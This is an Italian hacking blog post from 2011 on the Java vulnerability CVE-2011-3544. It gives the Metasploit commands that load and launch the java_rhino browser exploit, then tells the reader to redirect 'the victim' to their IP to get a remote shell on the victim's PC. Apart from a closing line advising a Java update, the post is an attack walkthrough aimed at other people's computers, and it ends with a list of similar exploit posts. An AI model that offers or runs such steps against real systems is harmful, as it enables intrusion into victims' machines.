[CVE-2011-3544]Metasploit: Java Remote untrusted Java Web Start
Esistono da tempo i payload per metasploit che consentono di attivare un applet maligno che se fatto partire ci consente di aprirci una shell remota sul pc vittima.
La vulnerabilità siglata con CVE-2011-3544 consente di bypassare il controllo utente.
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7 and 6 Update 27 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Scripting.
Per metasploit è già uscito l’exploit :)
Per provarlo aggiorniamo metasploit:
msfupdate
Avviamo metasploit:
msfconsole
Cerchiamo l’exploit:
search CVE-2011-3544
Nel mio caso:
java_rhino
Il nome potrebbe cambiare ;)
Settiamo l’exploit:
use exploit/multi/browser/java_rhino
Per vedere le opzioni:
show options
Facciamo partire :D
exploit
Ora re-direzioniamo la vittima sul nostro ip e win :D
Se avete java v.v aggiornate ;)
Related posts:
- [Metasploit]Sun Java Web Start Plugin Remote Code Excution
- [DOS]CVE-2011-3192: Apache HTTPD Killer Remote Denial of Service
- [CVE-2010-1297]Metasploit:Flash Player 9x, 10.0 Remote code Excution
- IE 6/7 EXPLOIT XML Remote Code Execution with METASPLOIT
- [CVE-2010-2568]Metasploit:windows Oday Remote Code Exuction
This entry was posted on Wednesday, November 30th, 2011 at 2:03 pm and is filed under GNU/Linux, Hacking, Software. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.
Tagged with: cve • java • metasploit






